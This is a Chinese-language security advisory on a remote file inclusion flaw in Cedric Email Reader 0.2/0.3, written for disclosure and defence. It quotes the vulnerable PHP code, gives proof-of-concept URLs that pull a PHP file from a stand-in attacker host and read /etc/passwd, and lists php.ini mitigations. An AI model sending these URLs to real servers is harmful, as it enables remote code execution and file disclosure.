发布日期：2003-02-10
更新日期：2003-02-18

受影响系统：

ISOCA Cedric Email Reader 0.3
ISOCA Cedric Email Reader 0.2

描述：

---

BUGTRAQ  ID: 6818

Cedric Email Reader是一款由PHP编写的基于WEB的邮件客户端。

Cedric Email Reader包含的email.php3脚本对用户提交的输入缺少正确检查，远程攻击者可以利用这个漏洞包含恶意PHP文件，以WEB进程权限执行PHP文件中的任意命令。

email.php3(版本0.2)或email.php(版本0.3)包含如下代码：

---------------------------------
[...]
require('emailreader.ini');
if ($login > "") {
parse_str($param);
include($cer_skin);
include('email.inc');
$mbox = openimap($server, $username, $password);
$text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------

由于对$cer_skin变量没有预先定义，因此可以通过全局注入来进行变量定义，攻击者可以指定远程系统中的PHP文件作为参数提交给$cer_skin变量，可导致以WEB权限执行PHP文件中包含的恶意代码。

<*来源：MGh （magas@mail.lt）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104489208932333&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

MGh （magas@mail.lt）提供了如下测试方法：

http://[target]/email.php?login=attacker&cer_skin=http://attacker]/code.php

包含远程机器上PHP文件。

或包含本地机器上的文件：

http://[target]/email.php?login=attacker&cer_skin=/etc/passwd

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 编辑php.ini文件，设置'allow_url_fopen'和'register_globals'选项为'off'。

厂商补丁：

ISOCA
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.isoca.com/creation/webmail/index_en.php

浏览次数：3425
严重程度：0（网友投票）